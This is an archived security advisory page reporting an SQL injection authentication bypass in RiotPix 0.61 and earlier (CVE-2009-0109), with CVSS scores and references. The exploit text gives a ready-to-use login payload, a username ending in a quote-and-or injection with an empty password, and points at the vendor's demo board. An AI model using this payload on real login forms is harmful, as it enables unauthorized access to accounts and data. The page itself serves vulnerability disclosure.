Bug: RiotPix <= 0.61 (Auth Bypass) SQL Injection Vulnerability ( Ascii Version )

Search:
WLB2

RiotPix <= 0.61 (Auth Bypass) SQL Injection Vulnerability

Published
Credit
Risk
2009.01.10
ZoRLu
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2009-0109
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

[~] RiotPix <= 0.61 Bypass
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
[~]
[~] Date: 06.01.09
[~]
[~] Home: z0rlu.blogspot.com / www.experl.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] EN ONEMLi N0T: demolarI hackleyen top olsun top ( if you hack demo you will be ball xD )
[~] -----------------------------------------------------------

for demo:

username: logoz ' or '

pass: dont write anything

http://www.riotpix.com/board/

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & Scriptorium & h4ckinger & Cyber_Thief & BLaSTeR & Ahmet and all experl.com
users :)
[~]
[~] yildirimordulari.org & experl.com
[~]
[~]----------------------------------------------------------------------

References:

http://www.securityfocus.com/bid/33132
http://www.milw0rm.com/exploits/7682
http://secunia.com/advisories/33395

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version